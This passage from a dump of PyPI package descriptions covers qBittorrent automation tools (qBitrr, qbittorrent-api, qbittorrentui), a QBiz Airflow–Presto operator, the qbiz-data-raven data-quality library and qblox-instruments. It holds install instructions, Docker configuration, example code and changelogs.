Composeversion:\"3\"services:qbitrr:image:qbitrruser:1000:1000#Requiredtoensuretehcontainerisrunastheuserwhohaspermstoseethe2mountpointsandtheabilitytowritetotheCompletedDownloadFoldermounttty:true#Ensuretheoutputofdocker-composelogsqbitrrareproperlycolored.restart:unless-stopped#networks:ThiscontainerMUSTshareanetworkwithyourSonarr/Radarrinstancesenviroment:TZ:Europe/Londonvolumes:-/etc/localtime:/etc/localtime:ro-/path/to/appdata/qbitrr:/config#Allqbitrrfilesarestoredinthe`/config`folderwhenusingadockercontainer-/path/to/sonarr/db:/sonarr.db/path/in/container:ro#Thisisonlyneededifyouwantepisodesearchhandling:romeansitisonlyevermountedasaread-onlyfolder,thescriptneverneedsmorethanreadaccess-/path/to/radarr/db:/radarr.db/path/in/container:ro#Thisisonlyneededifyouwantmoviesearchhandling,:romeansitisonlyevermountedasaread-onlyfolder,thescriptneverneedsmorethanreadaccess-/path/to/completed/downloads/folder:/completed_downloads/folder/in/container:rw#ThescriptwillALWAYSrequirewritepermissioninthisfolderifmounted,thisfolderisusedtomonitorcompleteddownloadsandifnotpresentwillcausethescripttoignoredownloadedfilemonitoring.#Nowjusttomakesureitisclean,whenusingthisscriptinadockeryouwillneedtoensureyouconfig.tomlvaluesreflectthemountedfolders.##Forexample,foryourSonarr.DatabaseFilevalueusingthevaluesaboveyou'dadd#DatabaseFile=/sonarr.db/path/in/container/sonarr.db#Becausethisiswhereyoumounteditto#ThesamewouldapplytoSettings.CompletedDownloadFolder#e.gCompletedDownloadFolder=/completed_downloads/folder/in/containerlogging:#thisscriptwillgenerateaLOToflogs-soitisuptoyoutodecidehowmuchofityouwanttostoredriver:\"json-file\"options:max-size:\"50m\"max-file:3depends_on:#NotneededbutthisensuresqBitrronlystartsifthedependenciesareupandrunning-qbittorrent-radarr-1080p-sonarr-1080p-animarr-1080p-overseerrImportant mentions for dockerThe script will always expect a completed config.toml fileWhen you first start the container a \"config.rename_me.toml\" will be added to/path/to/appdata/qbitrrMake sure to rename it to 'config.toml' then edit it to your desired values"} +{"package": "qBitrr2", "pacakge-description": "qBitrrA simple script to monitorqBitand communicate withRadarrandSonarrNoticeI am starting development on qBitrr+ which will be C# based for better overall performance and will also include a WebUI for better refined control on setting and what to search/upgrade etc. Hoping this will be the be all and end all application to manage your Radarr/Sonarr, Overseerr/Ombi and qBittorrent instances in one UI. 
This is still in it's very early stages and will likely be a couple months before a concrete beta is rolled out (from start of February 2024). Once I have something solid I will remove this notice and add a link to the new qBitrr+, in the meantime I will be sharing periodic updates on myPatreonFeaturesMonitor qBit for Stalled/bad entries and delete them then blacklist them on Arrs (Option to also trigger a re-search action).Monitor qBit for completed entries and tell the appropriate Arr instance to import it:qbitrr DownloadedMoviesScanfor Radarrqbitrr DownloadedEpisodesScanfor SonarrSkip files in qBit entries by extension, folder or regex.Monitor completed folder and clean it up.Usage offfprobeto ensure downloaded entries are valid media.Trigger periodic Rss Syncs on the appropriate Arr instances.Trigger Queue update on appropriate Arr instances.Search requests fromOverseerrorOmbi.Auto add/remove trackersSet per tracker valuesSonarr v4 supportRadarr v4 and v5 supportMonitor Arr's to trigger missing episode searches.Searches Radarr missing movies based on Minimum AvailabilityCustomizable searching by series or singular episodesOptionally searches year by year is ascending or descending order (config option available)Search for CF Score unmet and cancel torrents base on CF Score or Quality unmet searchSet minimum free space in download directory and pause torrent downloads accordinglyTested withSome things to know before using it.qBittorrent >= 4.5.xSonarrandRadarrboth setup to add tags to all downloads.qBit set to create sub-folders for tag.UsageNativepython -m pip install qBitrr2(I would recommend in a dedicatedvenvbut that's out of scope.Alternatively:Download thelatest releaseRun the scriptActivate your venvRunqBitrr2to generate a config fileEdit the config file (located at~/config/config.toml(~ is your current directory)RunqBitrr2if installed through pip again to start the scriptAlternatively:Unzip the downloaded release and run itRunqBitrrto generate a config fileEdit the config file (located at~/config/config.toml(~ is your current directory)RunqBitrrif installed through pip again to start the scriptHow to update the scriptActivate your venvRunpython -m pip install -U qBitrr2Alternatively:Download on thelatest releaseUnzip the downloaded release and run itRunqBitrrto generate a config fileEdit the config file (located at~/config/config.toml(~ is your current directory)RunqBitrrif installed through pip again to start the scriptThere is no auto-update feature, you will need to manually download the latest release and replace the old one.DockerDocker ImageThe docker image can be found onDockerHuborGithubDocker Rundockerrun-d\\--name=qbitrr\\-eTZ=Europe/London\\-v/etc/localtime:/etc/localtime:ro\\-v/path/to/appdata/qbitrr:/config\\-v/path/to/completed/downloads/folder:/completed_downloads:rw\\--restartunless-stopped\\feramance/qbitrr:latestDocker Composeversion:\"3\"services:qbitrr:image:feramance/qbitrr:latestuser:1000:1000# Required to ensure the container is run as the user who has perms to see the 2 mount points and the ability to write to the CompletedDownloadFolder mounttty:true# Ensure the output of docker-compose logs qBitrr are properly colored.restart:unless-stopped# networks: This container MUST share a network with your Sonarr/Radarr instancesenvironment:-TZ=Europe/Londonvolumes:-/etc/localtime:/etc/localtime:ro-/path/to/appdata/qbitrr:/config# Config folder for qBitrr-/path/to/completed/downloads/folder:/completed_downloads:rw# The script will ALWAYS require write permission 
in this folder if mounted, this folder is used to monitor completed downloads and if not present will cause the script to ignore downloaded file monitoring.# Now just to make sure it is clean, when using this script in a docker you will need to ensure you config.toml values reflect the mounted folders.# The same would apply to Settings.CompletedDownloadFolder# e.g CompletedDownloadFolder = /completed_downloads/folder/in/containerlogging:# this script will generate a LOT of logs - so it is up to you to decide how much of it you want to storedriver:\"json-file\"options:max-size:\"50m\"max-file:3depends_on:# Not needed but this ensures qBitrr only starts if the dependencies are up and running-qbittorrent-radarr-1080p-radarr-4k-sonarr-1080p-sonarr-anime-overseerr-ombiImportant mentions for dockerThe script will always expect a completed config.toml fileWhen you first start the container a \"config.rename_me.toml\" will be added to/path/to/appdata/qbitrrMake sure to rename it to 'config.toml' then edit it to your desired valuesFeature SuggestionsPlease do not hesitate to open an issue for feature requests or any suggestions you may have. I plan on periodically adding any features I might feel I want to add but welcome to other suggestions I might not have thought of yet.Reporting an IssueWhen reporting an issue, please ensure that log files are enabled while running qBitrr and attach them to the issue. Thank you."} +{"package": "qbittorrent", "pacakge-description": "Python wrapper for QBittorrent web api v3.1.x"} +{"package": "qbittorrent-api", "pacakge-description": "qBittorrent Web API ClientPython client implementation for qBittorrent Web APICurrently supports qBittorrentv4.6.3(Web API v2.9.3) released on January 14, 2024.User Guide and API Reference available onRead the Docs.FeaturesThe entire qBittorrentWeb APIis implemented.qBittorrent version checking for an endpoint's existence/features is automatically handled.If the authentication cookie expires, a new one is automatically requested in line with any API call.InstallationInstall via pip fromPyPIpython-mpipinstallqbittorrent-apiGetting Startedimportqbittorrentapi# instantiate a Client using the appropriate WebUI configurationconn_info=dict(host=\"localhost\",port=8080,username=\"admin\",password=\"adminadmin\",)qbt_client=qbittorrentapi.Client(**conn_info)# the Client will automatically acquire/maintain a logged-in state# in line with any request. 
therefore, this is not strictly necessary;# however, you may want to test the provided login credentials.try:qbt_client.auth_log_in()exceptqbittorrentapi.LoginFailedase:print(e)# if the Client will not be long-lived or many Clients may be created# in a relatively short amount of time, be sure to log out:qbt_client.auth_log_out()# or use a context manager:withqbittorrentapi.Client(**conn_info)asqbt_client:ifqbt_client.torrents_add(urls=\"...\")!=\"Ok.\":raiseException(\"Failed to add torrent.\")# display qBittorrent infoprint(f\"qBittorrent:{qbt_client.app.version}\")print(f\"qBittorrent Web API:{qbt_client.app.web_api_version}\")fork,vinqbt_client.app.build_info.items():print(f\"{k}:{v}\")# retrieve and show all torrentsfortorrentinqbt_client.torrents_info():print(f\"{torrent.hash[-6:]}:{torrent.name}({torrent.state})\")# pause all torrentsqbt_client.torrents.pause.all()Change Logv2024.2.59 (25 feb 2024)Allow added RSS feeds without a name/path to default to the name in the feed (#423)Advertise support for Python 3.13 (#349)v2024.1.58 (16 jan 2024)Advertise support for qBittorrent v4.6.3v2023.11.57 (27 nov 2023)Advertise support for qBittorrent v4.6.2v2023.11.56 (20 nov 2023)Advertise support for qBittorrent v4.6.1Add support fortorrents/count(#366)v2023.11.55 (6 nov 2023)Remove Python 2 platform tag from published wheel (#369)v2023.10.54 (22 oct 2023)Advertise support for qBittorrent v4.6.0Dropped support for legacy Python versions; Python 3.8+ is supported (#333)Refactored typing from stub files in to source (#345)Dropped support for API method argumentshashandhashes; usetorrent_hashandtorrent_hashes, respectively (#345)For example, replaceclient.torrents_info(hashes=\"...\")withclient.torrents_info(torrent_hashes=\"...\")v2023.9.53 (7 sept 2023)Advertise support for Python 3.12Advertise support for qBittorrent v4.5.5Addinactive_seeding_time_limitfortorrents/setShareLimits(#271)Implementapp/networkInterfaceListandapp/networkInterfaceAddressList(#272)v2023.7.52 (13 jul 2023)Ensure the wheel is uploaded with the release to PyPIv2023.7.51 (13 jul 2023)ConvertAPINamesandTorrentStatustoStrEnumandTrackerStatustoIntEnum(#267)v2023.6.50 (19 jun 2023)Advertise support for qBittorrent v4.5.4v2023.6.49 (9 jun 2023)TheClientis no longer binded toLists (#230)This does not affect normal operation but allows for slicing, adding, and copyingListsv2023.5.48 (29 may 2023)Advertise support for qBittorrent v4.5.3v2023.4.47 (19 apr 2023)Clientcan now be used as a context managerv2023.4.46 (14 apr 2023)Fix building docs after implementingsrc-layoutv2023.4.45 (11 apr 2023)Add theTrackerStatusEnum to identify tracker statuses fromtorrents/trackersv2023.3.44 (09 mar 2023)Add support for torrent status filtersseeding,moving,errored, andcheckingv2023.2.43 (27 feb 2023)Advertise support for qBittorrent v4.5.2v2023.2.42 (13 feb 2023)Advertise support for qBittorrent v4.5.1v2023.2.41 (8 feb 2023)Remove dependence on qBittorrent authentication cookie being namedSIDMinor typing fixesv2022.11.40 (27 nov 2022)Support qBittorrent v4.5.0 releaseAdd support fortorrents/exportImplement newtransfer/setSpeedLimitsModein place of existingtransfer/toggleSpeedLimitsModeAdd support forstopConditionintorrents/addUpdate typing to be complete, accurate, and shipped with the packagev2022.10.39 (26 oct 2022)Advertise support for Python 3.11v2022.8.38 (31 aug 2022)Advertise support for qBittorrent v4.4.5v2022.8.37 (24 aug 2022)Advertise support for qBittorrent v4.4.4v2022.8.36 (15 aug 2022)Comply with enforced HTTP method requirements 
from qBittorrentv2022.8.35 (13 aug 2022)RemovePYTHON_prefix for configuration environment variablesv2022.8.34 (11 aug 2022)Addsetuptoolsas an explicit dependency forpkg_resources.parse_version()v2022.7.33 (27 jul 2022)Reorder class hierarchy to allow independent MixIn useClean up typing annotationsOptimize Dictionary and List initializationsRename Alias decorator to alias for better conformityv2022.5.32 (30 may 2022)Implement pre-commit checksAdvertise support for qBittorrent v4.4.3.1v2022.5.31 (24 may 2022)Advertise support for qBittorrent v4.4.3Revamp GitHub CIReorgRequestfor some more clarity (hopefully)v2022.4.30 (3 apr 2022)Stop advertising support for Python 3.6 (EOL 12/2021)Publish to PyPI using API token and cleanup GitHub Action scriptsv2022.3.29 (25 mar 2022)Advertise support for qBittorrent v4.4.2v2022.2.28 (17 feb 2022)Advertise support for qBittorrent v4.4.1qBittorrent reverted the category dictionary keysavePathback tosave_pathv2022.1.27 (9 jan 2022)Support for qBittorrent v4.4.0torrents/inforesults can now be filtered by a torrent tagAdded new torrent state \"Forced Metadata Downloading\"Support per-torrent/per-category \"download folder\"v2021.12.26 (11 dec 2021)Stop sendingOriginandRefererheaders (Fixes #63)v2021.12.25 (10 dec 2021)Close files that are opened and sent to Requests when adding torrents from filesEnable warnings for tests and explicitly close Requests Sessions to prevent (mostly spurious) ResourceWarningsv2021.12.24 (3 dec 2021)Add Type Hints for all public and private functions, methods, and variablesSupport HTTP timeouts as well as arbitrary Requests configurationsv2021.8.23 (28 aug 2021)Advertise support for qBittorrent v4.3.8Drop support for Python 3.5v2021.5.22 (12 may 2021)Support for qBittorrent v4.3.5torrents/filesincludesindexfor each file;indexofficially replacesidbutidwill still be populatedv2021.5.21 (1 may 2021)Allow users to force a specific communications scheme withFORCE_SCHEME_FROM_HOST(fixes #54)v2021.4.20 (11 apr 2021)Add support for ratio limit and seeding time limit when adding torrentsv2021.4.19 (8 apr 2021)Update license in setup to match gpl->mit license change on GitHubv2021.3.18 (13 mar 2021)ReplaceTorrentStates.FORCE_DOWNLOAD='forceDL'withTorrentStates.FORCED_DOWNLOAD='forcedDL'v2021.2.17 (7 feb 2021)Generally refactorrequests.pyso it's better and easier to readPersist a Requests Session between API calls instead of always creating a new one...small perf benefitMove auth endpoints back to a dedicated moduleSinceattrdictis apparently going to break in Python 3.10 and it is no longer maintained, I've vendored a modified version (fixes #45)Createdhandle_hashesdecorator to hide the cruft of continuing to support hash and hashes argumentsv2021.1.16 (26 jan 2021)Support qBittorrent v4.3.3 and Web API v2.7 (...again)Newtorrents/renameFileandtorrents/renameFolderendpointsRetrieve app api version when needed instead of cachingStop verifying and removing individual parameters when they aren't supportedv2020.12.15 (27 dec 2020)Support qBittorrent v4.3.2 and Web API v2.7torrents/addsupports adding torrents with tags viatagsparameterapp/preferencessupports toggling internationalized domain name (IDN) support viaidn_support_enabledBREAKING CHANGE: fortorrents/add,is_root_folder(orroot_folder) is superseded bycontent_layoutFortorrents/delete,delete_filesnow defaults toFalseinstead of required being explicitly passedv2020.12.14 (6 dec 2020)Add support for non-standard API endpoint paths (Fixes #37)Allows users to leverage this client when 
qBittorrent is configured behind a reverse proxyFor instance, if the Web API is being exposed at \"http://localhost/qbt/\", then users can instantiate viaClient(host='localhost/qbt')and all API endpoint paths will be prefixed with \"/qbt\"Additionally, the scheme (i.e. http or https) from the user will now be respected as the first choice for which scheme is used to communicate with qBittorrentHowever, users still don't need to even specify a scheme; it'll be automatically determined on the first connection to qBittorrentNeither of these should be breaking changes, but if you're instantiating with an incorrect scheme or an irrelevant path, you may need to prevent doing that nowv2020.11.13 (29 nov 2020)Support qBittorrent v4.3.1 and Web API v2.6.1Path of torrent content now available viacontent_pathfromtorrents/infov2020.11.12 (16 nov 2020)Fix support for raw bytes fortorrent_filesintorrents_add()for Python 3 (Fixes #34)v2020.10.11 (29 oct 2020)Support qBittorrent v4.3.0.1 and Web API v2.6Due to qBittorrent changes,search/categoriesno longer returns anything andrss/renameRuleworks againv2020.10.10 (7 oct 2020)Advertise support for Python 3.9v2020.9.9 (12 sept 2020)Only requestenum34for Python 2v2020.8.8 (14 aug 2020)Support adding torrents from raw torrent files as bytes or file handles (Fixes #23)IntroduceTorrentStatesenum for qBittorrent list of torrent statesv2020.7.7 (26 jul 2020)Update tests and misc small fixesv2020.7.6 (25 jul 2020)Re-release of v2020.7.5v2020.7.5 (25 jul 2020)Add RTD documentationv2020.6.4 (9 jun 2020)Bug fix release. Reorganized code and classes to be more logicalStarted returning None from many methods that were returning Requests ResponsesContent-Length header is now explicitly sent as \"0\" for any POSTs without a bodyEndpoint input parametershashandhashesare renamed totorrent_hashandtorrent_hashes.hashandhashesremain supportedsearch_uninstall_pluginnow works. search_enable_plugin now supports multiple pluginsTorrent.download_limitnow only return the value instead of a dictionary.Torrent.upload_limitnow worksDrop advertising Python 2.6 and 3.4 support; add PyPy3 supportImplement test suite and CI that can test all supported qBittorrent versions on all pythonsv2020.5.3 (11 may 2020)Include currently supported qBittorrent version in README (Fixes #11)v2020.4.2 (25 apr 2020)Add support forrss/markAsReadandrss/matchingArticles. Added in v2.5.1 (Fixes #10)v2020.4.1 (25 apr 2020)Addstalled(),stalled_uploading(), andstalled_downloading()totorrents.infointeraction; added in Web API v2.4.1Implement torrent file renaming. Added in Web API v2.4.0 (Fixes #3)Since versioning was botched last release, implement calendar versioningList of files returned fromtorrents_files()now contains file ID inidv6.0.0 (22 apr 2020)Performance gains for responses with payloads...especially for large payloadsFixes #6. Adds support forSIMPLE_RESPONSESfor the entire client and individual methodsv0.5.2 (19 apr 2020)Fixes #8. 
Remove whitespace from in setPreferences requests for older qBittorrent versionsv0.5.1 (2 jan 2020)Add Python3.8 version for PyPIMove project from beta to stable for PyPIv0.5.0 (2 jan 2020)Make Web API URL derivation more robust...thereby allowing the client to actually work on Python3.8 (#5)Allow port to be discretely specified during Client instantiation (#4)Enhance request retry logic and expose retry configurationv0.4.2 (5 dec 2019)Improve organization and clarity of READMEBetter document exceptionsClarify torrent file handling exceptions better with proper exceptionsClean up the request wrapper exception handlingFix HTTP 404 handling to find and return problematic torrent hashesv0.4.1 (4 dec 2019)Round out support for tags with qBittorrent v4.2.0 releaseRemove upper-bound version requirements forrequestsandurllib3v0.4 (4 dec 2019)Support for qBittorrent v4.2.0 releaseAdd support forapp/buildInfoAdd support fortransfer/banPeersandtorrents/addPeersAdd support fortorrents/addTags,torrents/removeTags,torrents/tags,torrents/createTags, andtorrents/deleteTagsv0.3.3 (29 sept 2019)Fix useAutoTMM to autoTMM forclient.torrents_add()so auto torrent management worksAdd support to refresh RSS items introduced in qBittorrent v4.1.8v0.3.2 (28 jun 2019)Restore python 2 compatibilityAllow exceptions to be imported directly from package instead of only exceptions modulev0.3 (1 jun 2019)Finalized interaction layer interfacesv0.2 (13 may 2019)Introduced the \"interaction layer\" for transparent interaction with the qBittorrent APIv0.1 (7 may 2019)Complete implementation of qBittorrent WebUI API 2.2Each API endpoint is available via theClientclassAutomatic re-login is supported in the event of login expirationMIT LicenseCopyright (c) Russell MartinPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qbittorrentrpc", "pacakge-description": "qbittorrentrpcSimple qbittorrent HTTP-RPC client.HierarchyExamplepythonSeetest."} +{"package": "qbittorrentui", "pacakge-description": "qBittorrenTUIConsole UI for qBittorrent. Not feature-complete but is usable for low volume and everyday torrenting.Key MapAny Windowq : exitn : open connection dialogTorrent List Windowa : open add torrent dialogenter : open context menu for selected torrentright arrow: open Torrent WindowTorrent Windowleft : return to Torrent Listesc : return to Torrent ListContententer : bump priorityspace : bump priorityInstallationInstall from pypi:pipinstallqbittorrentuiIn most cases, this should allow you to run the application simply with theqbittorrentuicommand. 
Alternatively, you can specify a specific python binary with./venv/bin/python -m qbittorrentuior similar.ConfigurationConnections can be pre-defined within a configuration file (modeled after default.ini). Specify the configuration file using --config_file. Each section in the file will be presented as a separate instance to connect to.Sample configuration file section:[localhost:8080]\nHOST = localhost\nPORT = 8080\nUSERNAME = admin\nPASSWORD = adminadmin\nCONNECT_AUTOMATICALLY = 1\nTIME_AFTER_CONNECTION_FAILURE_THAT_CONNECTION_IS_CONSIDERED_LOST = 5\nTORRENT_CONTENT_MAX_FILENAME_LENGTH = 75\nTORRENT_LIST_MAX_TORRENT_NAME_LENGTH = 60\nTORRENT_LIST_PROGRESS_BAR_LENGTH = 40\nDO_NOT_VERIFY_WEBUI_CERTIFICATE = 1Only HOST, USERNAME, AND PASSWORD are required.\nDO_NOT_VERIFY_WEBUI_CERTIFICATE is necessary if the certificate is untrusted (e.g. self-signed).TODO/WishlistApplicationFigure out the theme(s)Configuration for connectionsLog/activity output (likely above status bar)Implement window for editing qBittorrent settingsTorrent List WindowTorrent sortingAdditional torrent filtering mechanismsTorrent searchingTorrent status icon in torrent nameTorrent name color codingTorrent list column configurationTorrent WindowMake focus more obvious when switching between tabs list and a displayScrollbar in the displaysSpeed graph displayTorrent Window Content DisplayLeft key should return to tab listMIT LicenseCopyright (c) Russell MartinPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qbiz-airflow-presto", "pacakge-description": "The QBiz, inc. Airflow-Presto package provides anAirflow Operatorwhich\nis designed to run containerized Presto nodes using Amazon'sElastic Container Service. It is designed to dynamically create and destroyFargatecompute resources to minimize cost. This package does not include\nthe Docker Image nor will it attempt to create other AWS resources necessary\nlaunch ECS tasks -- although examples are provided. 
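For orientation, the sketch below shows roughly how an operator from this package would be wired into a DAG. Only the surrounding Airflow boilerplate is standard; the import path, the operator class name and its arguments are hypothetical placeholders, and the referenced AWS resources (ECS cluster, task definition) are assumed to already exist, since the package does not create them:

from datetime import datetime

from airflow import DAG
# Hypothetical import and class name, for illustration only; consult the
# package's bundled examples for the operator it actually exposes.
from qbiz_airflow_presto import PrestoFargateOperator

with DAG(
    dag_id="presto_on_ecs_example",
    start_date=datetime(2021, 1, 1),
    schedule_interval=None,  # run on demand; Fargate capacity exists only while the task runs
    catchup=False,
) as dag:
    run_presto = PrestoFargateOperator(
        task_id="run_presto_workers",
        # Assumed arguments pointing at pre-existing AWS resources.
        ecs_cluster="my-ecs-cluster",
        task_definition="qbiz-presto-node",
        worker_count=3,
    )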
A Dockerfile to\nbuild your own image can be found in theQbiz Code Repository."} +{"package": "qbiz-data-raven", "pacakge-description": "qbiz-data-ravenDescriptionA toolbox of flexible database connectors and test methods used to measure data integrity of datasets and database\ntables.Build data quality tests which can be inserted into an existing Python script or run as a stand-alone script.Send outcome notifications to messaging and logging applications.Halt pipelines and raise exceptions when needed.PrerequisitesPython 3.6+sqlalchemy>=1.3.19psycopg2pymysqlInstallingpip install qbiz-data-ravenA simple data quality test scriptIn this example we build a script to test thename,priceandproduct_idcolumns from the Postgres tableOrders.\nThis table has the following DDL:create table Orders (\nid int,\nname varchar(50),\norder_ts varchar(26),\nproduct_id int,\nprice float\n);Here's the test script.import os\n\nfrom qbizdataraven.connections import PostgresConnector\nfrom qbizdataraven.data_quality_operators import SQLNullCheckOperator\n\n\ndef main():\n # initialize logging\n lazy_logger = lambda msg: print(msg + '\\n')\n\n # database connection credentials\n user = os.environ[\"user\"]\n password = os.environ[\"password\"]\n host = os.environ[\"host\"]\n dbname = os.environ[\"dbname\"]\n port = os.environ[\"port\"]\n\n # postgres database connector\n conn = PostgresConnector(user, password, host, dbname, port, logger=lazy_logger)\n dialect = \"postgres\"\n\n # test thresholds\n threshold0 = 0\n threshold1 = 0.01\n threshold5 = 0.05\n\n ##### TEST ORDERS TABLE #####\n # Table to be tested\n from_clause = \"test_schema.Orders\"\n\n # Conditional logic to be applied to input data\n date = \"2020-09-08\"\n where_clause = [f\"date(order_ts) = '{date}'\"]\n\n # Columns to be tested in target table\n columns = (\"name\", \"product_id\", \"price\")\n\n # Threshold value to be applied to each column\n threhold = {\"name\": threshold1, \"product_id\": threshold0, \"price\": threshold5}\n\n # Hard fail condition set on specific columns\n hard_fail = {\"product_id\": True}\n\n # Execute the null check test on each column in columns, on the above table\n SQLNullCheckOperator(conn, dialect, from_clause, threhold, *columns, where=where_clause, logger=lazy_logger,\n hard_fail=hard_fail)\n\n\nif __name__ == \"__main__\":\n main()DocumentationDatabase SupportPostgresMySQLData Quality TestsData quality tests are used to measure the integrity of specified columns within a table or document. Every data\nquality test will return'test_pass'or'test_fail'depending on the given measure and threshold.Data Quality OperatorsEach operator will log the test results using the function passed in theloggerparameter. If no logger is found then\nthese log messages will be swallowed.Each operator has atest_resultsattribute which exposes the results from the underlying test.test_resultsis adictobject with the following structure:{\n COLUMN NAME: {\n \"result\": 'test_pass' or 'test_fail',\n \"measure\": THE MEASURED VALUE OF COLUMN NAME,\n \"threshold\": THE THRESHOLD VALUE SPECIFIED FOR TEST,\n \"result_msg\": TEST RESULT MESSAGE\n }\n}SQL OperatorsAll SQL operators have the following required parameters:conn- The database connection object.dialect- The SQL dialect for the given database. Accepted values arepostgresormysql.from_- The schema and table name of table to be tested.threshold- The threshold specified for a given test or collection of tests. This parameter can be numeric or adictobject. 
Ifthresholdis numeric then this value will be applied to all columns being tested by the operator.\nIfthresholdis adictthen eachthresholdvalue will be referenced by column name. All columns being passed to the\noperator must have a specified threshold value. Ifthresholdis adictit must have the following structure:{\n COLUMN NAME: NUMERIC VALUE\n}columns- The column names entered as comma separated positional arguments.All SQL operators have the following optional parameters:logger- The logging function. If None is passed then logged messages will be swallowed.where- Conditional logic to be applied to table specified infrom_.hard_fail- Specifies if an operator which has a test which results in'test_fail'should terminate the current\nprocess. This parameter\ncan be passed as a literal or adictobject. Ifhard_failis set toTruethen every test being performed by the\ngiven operator which results in'test_fail'will terminate the current process. Ifhard_failis adictobject then\neachhard_failvalue will be referenced by column name. Only those columns with ahard_failvalue ofTruewill\nterminate the process upon test failure. Ifhard_failis adictit must have the following structure:{\n COLUMN NAME: BOOLEAN VALUE\n}use_ansi- If true then compile measure query to ANSI standards.SQLNullCheckOperator- Test the proportion of null values for each column contained incolumns.SQLDuplicateCheckOperator- Test the proportion of duplicate values for each column contained incolumns.SQLSetDuplicateCheckOperator- Test the number of duplicate values across all columns passed to thecolumnsparameter simultaniously. This measure is equivalent to counting the number of rows returned from aSELECT DISTINCTon\nall columns and dividing by the total number of rows.CSV OperatorsAll CSV operators have the following required parameters:from_- The path to CSV file to be tested.threshold- Same as defined above for SQL operators.columns- the column names entered as comma separated positional arguments.All CSV operators have the following optional parameters:delimiter- The delimiter used to separate values specified in the file refeneced by thefrom_parameter.hard_fail- Same as defined above for SQL operators.fieldnames- A sequence of all column names for CSV file specified infrom_parameter. To be used if the specified\nfile does not have column headers.reducer_kwargs- Key word arguments passed to the measure reducer function.CSVNullCheckOperator- Test the proportion ofNULLvalues for each column contained incolumns.CSVDuplicateCheckOperator- Test the proportion of duplicate values for each column contained incolumns.CSVSetDuplicateCheckOperator- Test the number of duplicate values across all columns passed to thecolumnsparameter simultaniously.Custom OperatorsCustomSQLDQOperator- Executes the test passed by thecustom_testparameter on each column contained incolumns.\nTheCustomSQLDQOperatorclass has the following required parameters:conn- The database connection object.custom_test- The SQL query to be executed. Thecustom_testquery is required to return a column labeledresultwhich takes value'test_pass'or'test_fail'. Thecustom_testquery should also return columnsmeasure, which\nprovides the measured column value, andthreshold, which gives the threshold used in the test. If these columns are\npresent then these values will be logged and returned in thetest_resultsattribute. 
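To make the custom_test contract just described concrete, here is a minimal illustrative sketch. It reuses the conn object and the Orders table from the example script earlier in this description; the import path and the exact positional/keyword signature of CustomSQLDQOperator are assumptions to verify against the package:

# Assumed to be importable alongside the other operators shown above.
from qbizdataraven.data_quality_operators import CustomSQLDQOperator

# The query must return a 'result' column valued 'test_pass' or 'test_fail';
# 'measure' and 'threshold' columns are optional but are logged when present.
custom_test = """
SELECT
    CASE WHEN COUNT(*) <= {threshold} THEN 'test_pass' ELSE 'test_fail' END AS result,
    COUNT(*) AS measure,
    {threshold} AS threshold
FROM test_schema.Orders
WHERE {column} < 0
"""

description = "check that {column} has no negative values (allowed violations: {threshold})"

# One test is generated for the 'price' column; 0 means no violations are tolerated.
CustomSQLDQOperator(conn, custom_test, description, "price", threshold=0)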
If measure and threshold are not returned by the custom_test query then these values will be logged as None, and will be given in the test_results attribute as None. custom_test can also be a query template with placeholders {column} and {threshold} for variable column names and threshold values.description- The description of the data quality test being performed. The description may contain placeholders {column} and {threshold} for the optional parameters columns and threshold, if they are passed to the CustomSQLDQOperator. In this case a test description will be generated for each column in columns and for each value of threshold.The CustomSQLDQOperator class has the following optional parameters:columns- a comma separated list of column arguments.threshold- Same as defined above for SQL operators.hard_fail- Same as defined above for SQL operators.test_desc_kwargs- Key word arguments for formatting the test description."}
{"package": "qblocal-backup", "pacakge-description": "qblocal_backup: a local backup tool for qbittorrent without calling the WebUI API.Usagepython -m qblocal_backup should be a directory."}
{"package": "qblox-instruments", "pacakge-description": "Welcome to Qblox InstrumentsThe Qblox instruments package contains everything to get started with Qblox instruments (i.e. Python drivers, documentation and tutorials).This software is free to use under the conditions specified in thelicense.For more information, please contactsupport@qblox.com.CreditsDevelopersQblox:Jordy Gloudemans Maria Garcia Damaz de Jong Daniel Weigand Adithyan Radhakrishnan Gábor Oszkár Dénes External:Pieter Eendebak ContributorsNone yet. Why not be the first?History0.11.2 (27-10-2023)Changelog:Added support for new cluster firmware release.API changes:Add a method to get the maximum allowed attenuation for that specific board and use it to populate the respective range of the QCoDeS parameter.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.11.1.Pulsar QRM: compatible with device firmwarev0.11.1.Cluster: compatible with device firmwarev0.6.2.Note:You can also find this release on Gitlabhere.0.11.1 (15-09-2023)Changelog:Fixed compatibility with Python 3.7.Fixed qblox-pnp under MacOS.Added support for new cluster 